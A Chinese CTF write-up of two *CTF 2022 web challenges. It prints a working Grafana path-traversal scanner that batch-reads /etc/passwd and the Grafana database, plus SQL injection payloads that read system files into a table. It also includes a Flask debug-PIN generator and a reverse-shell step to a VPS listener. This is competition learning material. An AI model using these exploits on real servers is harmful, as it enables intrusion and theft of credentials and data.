记2022Xctf web-WriteUp

前言：

这次xctf难度确实大，misc一个不会过于真实。web倒是学到了很多东西特别是notepro 学到了flask的pin码利用，sql堆叠注入等等。

SU战队大佬们嘎嘎带飞，师傅们tql。

总的来说还是学到很多东西的受益匪浅

Web

oh-my-grafana[solved]

百度搜索了一下Grafana是一个可视化测试数据的开源程序

直接搜索Grafana的漏洞后发现存在任意文件读取漏洞：

https://blog.csdn.net/qq_36197704/article/details/123480175

漏洞原理大致就是通过一些插件ID路径存在目录遍历漏洞导致了可以构造恶意url进行读取文件。

Burpsuite构造：

同时可以读取grafana的配置文件：

POC：（原脚本有些问题修改后可以下载配置文件）

#!/usr/bin/env python
# -*- conding:utf-8 -*-
  
  
import requests
import argparse
import sys
import urllib3
import time
  
  
urllib3.disable_warnings()
  
  
  
  
def title():
    print("""
                 ___                     __                                 ___                        _      ___   _   _      
                / __|  _ _   __ _   / _|  __ _   _ _    __ _     | _ \  ___   __ _   __| |    | __| (_) | |  ___
               | (_ | | '_| / _` | |  _| / _` | | ' \  / _` |    |  / / -_) / _` | / _` |   | _|  | | | | / -_)
               \___| |_|   \__,_| |_|   \__,_| |_||_| \__,_|  |_|_\ \___| \__,_| \__,_| |_|   |_| |_| \___|
  
  
  
  
  
  
                                     Author: Henry4E36
               """)
  
  
  
  
class information(object):
    def __init__(self, args):
        self.args = args
        self.url = args.url
        self.file = args.file
  
  
    def target_url(self):
        lists = ['grafana-clock-panel', 'alertGroups', 'alertlist', 'alertmanager', 'annolist', 'barchart', 'bargauge', \
                 'canvas', 'cloudwatch', 'cloudwatch', 'dashboard', 'dashboard', 'dashlist', 'debug', 'elasticsearch', \
                 'gauge', 'geomap', 'gettingstarted', 'grafana-azure-monitor-datasource', 'grafana', 'graph',
                 'graphite', \
                 'graphite', 'heatmap', 'histogram', 'influxdb', 'jaeger', 'live', 'logs', 'logs', 'loki', 'mixed', \
                 'mssql', 'mysql', 'news', 'nodeGraph', 'opentsdb', 'piechart', 'pluginlist', 'postgres', 'prometheus', \
                 'stat', 'state-timeline', 'status-history', 'table-old', 'table', 'tempo', 'testdata', 'text', \
                 'timeseries', 'welcome', 'xychart', 'zipkin']
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
        }
  
  
        # proxies = {
        #     "http": "http://127.0.0.1:8080",
        #
        # }
        for i in lists:
            target_url = self.url + f"/public/plugins/{i}/%23/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"
            try:
                res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)
                if res.status_code == 200 and "root:" in res.text:
                    print(f"\033[31m[{chr(8730)}] 目标系统: {self.url}的{i}插件存在任意文件读取\033[0m")
                    print(f"[-] 尝试读取DB文件:")
                    db_url = self.url + f"/public/plugins/{i}/%23/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/lib/grafana/grafana.db"
                    try:
                        res_db = requests.get(url=db_url, headers=headers, verify=False, timeout=25)
                        if res_db.status_code == 200 and "SQLite format" in res_db.text:
                            a = time.time()
                            with open(f'{a}.db', "wb") as f:
                                f.write(res_db.content)
                            f.close()
                            print(f"\033[31m[{chr(8730)}] 成功读取DB文件，信息保存在{a}.db文件中\033[0m")
                            break
                        else:
                            print(f"[-] 读取DB文件失败")
                    except Exception as e:
                        print(e)
                        print("[\033[31mX\033[0m] 读取DB文件错误,可能与请求时间有关!")
                        print("[" + "-" * 100 + "]")
                else:
                    print(f"[\033[31mx\033[0m]  目标系统: {self.url} 不存在{i}插件！")
                    print("[" + "-" * 100 + "]")
            except Exception as e:
                print("[\033[31mX\033[0m]  连接错误！")
                print("[" + "-" * 100 + "]")
  
  
    def file_url(self):
        with open(self.file, "r") as urls:
            for url in urls:
                url = url.strip()
                if url[:4] != "http":
                    url = "http://" + url
                self.url = url.strip()
                information.target_url(self)
  
  
  
  
if __name__ == "__main__":
    title()
    parser = ar = argparse.ArgumentParser(description='Grafana 任意文件读取')
    parser.add_argument("-u", "--url", type=str, metavar="url", help="Target url eg:\"http://127.0.0.1\"")
    parser.add_argument("-f", "--file", metavar="file", help="Targets in file  eg:\"ip.txt\"")
    args = parser.parse_args()
    if len(sys.argv) != 3:
        print(
            "[-]  参数错误！\neg1:>>>python3 grafana-read.py -u [url]http://127.0.0.1[/url]\neg2:>>>python3 grafana-read.py -f ip.txt")
    elif args.url:
        information(args).target_url()
  
  
    elif args.file:
        information(args).file_url()

这里的弯路就是将配置文件保存db下载后导入sqlite等数据库软件发现admin的password 但是有salt 所以又没有了思路

后来发现目标靶机存在ssh服务想通过某些用户弱口令进入但是无果也卡了。

最后找到一篇文章里面有讲grafana的主要文件这里grafana.ini是关键：

https://www.cnblogs.com/yanzi2020/p/14484227.html

用burpsuite读取下

EXP:/public/plugins/alertlist/../../../../../../../../../../../etc/grafana/grafana.ini

得到密码后直接登录后台即可，这里密码就是这么长不用反解。

admin 5f989714e132c9b04d4807dafeb10ade

因为环境没有docker 所以多人登录会被挤下去多换几台靶机即可。

进来后也卡了一会儿因为没有用过grafana 在网上找教程，大致了解可以通过mysql进行查询但是不知道具体怎么操作

甚至想怎么通过后台去RCE hhhh

后来自己琢磨了一下发现这个table点一下就有表：（复现的时候发现很多环境mysql都被删了所以共用环境体验是真的不好）

有了表之后编辑sql语句就行了这里的按钮确实看不懂用不明白

SELECT * FROM fffffflllllllllaaaagggggg 运行即可

FLAG:*ctf{Upgrade_your_grafAna_now!}

oh-my-notepro[unsolved]

sql注入 + flask debug PIN码构造

后台admin admin 登录

Create Note 创建一条留言

将note_id改为1后报错很明显是flask了

尝试sql注入：

1’ or 1=1 %23

正常回显发现是存在sql注入的且为回显型

通过查询发现有5个字段

查询数据库：

1’ union select 1,2,3,version(),database() %23

查询ctf表中所有表：

1’ union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema=database() %23

字段：

1’ union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_schema=database() and table_name=’ctf’ limit 0,1%23

当时查询的结果：

notes id username note_id text title
result value
tlsres100 cmd
users id username password

tlsres100的内容好像是py的源码后来就没做了。

复现的时候才发现这里sql注入不仅能查询还存在堆叠注入即可以创建表 - - 所以之前查询的可能都是别人创建的东西

flask的内容很多还不会，以上为我自己的做法，以下是自己参考大佬做法学到的

参考群里大佬们交流预期解应该是：

获取PIN码需要的东西，通过脚本构造flask debug的PIN码然后就能拿到python shell 最后反弹下shell即可。

构造PIN码需要：

1.flask所登录的用户名
2.modname
3.getattr(app, “name”, app.class.name)
4.getattr(mod, '__file__', None) flask库下app.py的绝对路径
5.uuid.getnode() 当前网络的mac地址的十进制数
6.get_machine_id() docker机器id

其中2.3.4都是可以默认获取的，用户名用/etc/passwd获取 mac地址用/sys/class/net/eth0/address docker的id Linux用/etc/machine-id Docker用/proc/self/cgroup

而pin码需要的东西需要用到sql注入去读取文件，这里sql注入直接是读取不到文件的，因为有堆叠注入所以可以通过堆叠注入创建一个表然后将需要的文件内容写到表里面最后查询表的内容获取用户名、mac地址、docker id。最后通过脚本构造PIN 反弹shell就能拿到flag了

进行python shell交互模式后开一个外网vps nc -lvvp port

这边python用socket连接ip:port

拿到shell后直接找flag即可。

实践一下：

创建表：1’;create table imtest(data text);%23

添加mac地址：1’;LOAD DATA LOCAL INFILE “/sys/class/net/eth0/address” INTO TABLE imtest;%23

docker id（这里要/etc/machine-id + /proc/self/cgroup的id加在一起）:
1’;LOAD DATA LOCAL INFILE “/etc/machine-id” INTO TABLE imtest;%23
1’;LOAD DATA LOCAL INFILE “/proc/self/cgroup” INTO TABLE imtest;%23

username：1’;LOAD DATA LOCAL INFILE “/etc/passwd” INTO TABLE imtest;%23

查询: 1’union select 1,2,3,group_concat(data),5 from imtest %23

02:42:ac:1c:00:03,1cc402dd0e11d5ae18db04a6de87223d,12:hugetlb:/docker/9fc232ff6eb31840f1c802ac880957794adb649d4392613b9fe26822a566b6ad,11:cpuset:/docker/9fc232ff6eb31840f1c802ac880957794adb649d4392613b9fe26822a566b6ad,10:rdma:/,9:devices:/docker/9fc232ff6eb31840f1c802ac880957794adb649d4392613b9fe26822a566b6ad,8:blkio:/docker/9fc232ff6eb31840f1c802ac880957794adb649d4392613b9fe26822a566b6ad,7:freezer:/docker/9fc232ff6eb31840f1c802ac880957794adb649d4392613b9fe26822a566b6ad,6:perf_event:/docker/9fc232ff6eb31840f1c802ac880957794adb649d4392613b9fe26822a566b6ad,5:cpu,cpuacct:/docker/9fc232ff6eb31840f1c802ac880957794adb649d4392613b9fe26822a566b6ad,4:pids:/docker/9fc232ff6eb31840f1c802ac880957794adb649d4392613b9fe26822a566b6ad,3:memory:/docker/9fc232ff6eb31840f1c802ac880957794adb649d4392613b9fe26822a566b6ad,2:net_cls,net_prio:/docker/9fc232ff6eb31840f1c802ac880957794adb649d4392613b9fe26822a566b6ad,1:name=systemd:/docker/9fc232ff6eb31840f1c802ac880957794adb649d4392613b9fe26822a566b6ad,0::/system.slice/containerd.servic

root:x:0:0:root:/root:/bin/bash,daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin,bin:x:2:2:bin:/bin:/usr/sbin/nologin,sys:x:3:3:sys:/dev:/usr/sbin/nologin,sync:x:4:65534:sync:/bin:/bin/sync,games:x:5:60:games:/usr/games:/usr/sbin/nologin,man:x:6:12:man:/var/cache/man:/usr/sbin/nologin,lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin,mail:x:8:8:mail:/var/mail:/usr/sbin/nologin,news:x:9:9:news:/var/spool/news:/usr/sbin/nologin,uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin,proxy:x:13:13:proxy:/bin:/usr/sbin/nologin,www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin,backup:x:34:34:backup:/var/backups:/usr/sbin/nologin,list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin,irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin,gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin,nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin,_apt:x:100:65534::/nonexistent:/usr/sbin/nologin,ctf:x:1000:1000::/home/ctf:/bin/sh

mac地址：2485378547715

02:42:ac:1c:00:03 转换10进制

/etc/machine-id：1cc402dd0e11d5ae18db04a6de87223d

/proc/self/cgroup：取 /docker/字符串后面的内容即9fc232ff6eb31840f1c802ac880957794adb649d4392613b9fe26822a566b6ad

docker-id = /etc/machine-id+/proc/self/cgroup = 1cc402dd0e11d5ae18db04a6de87223d9fc232ff6eb31840f1c802ac880957794adb649d4392613b9fe26822a566b6ad

username：ctf

（可能是靶机的原因 mac地址和docker-id几分钟之后就会刷新所以pin码可能会失效多试试就行。）

代入脚本跑：

#sha1
import hashlib
from itertools import chain
  
  
def pin(username,mac,dockerid):
    probably_public_bits = [
    username,# /etc/passwd
    'flask.app',# 默认值
    'Flask',# 默认值
    '/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]
  
  
  
  
    private_bits = [
        mac,#  /sys/class/net/eth0/address 16进制转10进制
        dockerid#  /etc/machine-id+/proc/self/cgroup
    ]
  
  
  
  
    h = hashlib.sha1()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode('utf-8')
        h.update(bit)
    h.update(b'cookiesalt')
  
  
  
  
    cookie_name = '__wzd' + h.hexdigest()[:20]
  
  
  
  
    num = None
    if num is None:
        h.update(b'pinsalt')
        num = ('%09d' % int(h.hexdigest(), 16))[:9]
  
  
  
  
    rv =None
    if rv is None:
        for group_size in 5, 4, 3:
            if len(num) % group_size == 0:
                rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                            for x in range(0, len(num), group_size))
                break
        else:
            rv = num
  
  
  
  
    return rv
  
  
if __name__ == '__main__':
    username = "ctf"
    mac = "02:42:ac:1c:00:03"
    machine = "1cc402dd0e11d5ae18db04a6de87223d"
    cgroup = "9fc232ff6eb31840f1c802ac880957794adb649d4392613b9fe26822a566b6ad"
    dockerid = machine + cgroup
    mac = str(int(mac.replace(':',''),16))
    pin = pin(username,mac,dockerid)
    print('[+] Pin: %s'%pin)

684-041-847

报错后点击：

输入：

Python shell：（或访问/console）

这里用os.system执行命令是无效的：

可以用popen来执行：

FLAG是一个可执行文件

所以我们直接执行一下/readflag即可：

或

import os
import subprocess
os.system('ls /')
#readflag FLAG是一个可执行文件
result = subprocess.getstatusoutput('/readflag')
print(result)

FLAG:*ctf{exploit_Update_with_Version}

参考文章：

https://cloud.tencent.com/developer/article/1726330

https://blog.csdn.net/weixin_46081055/article/details/120167680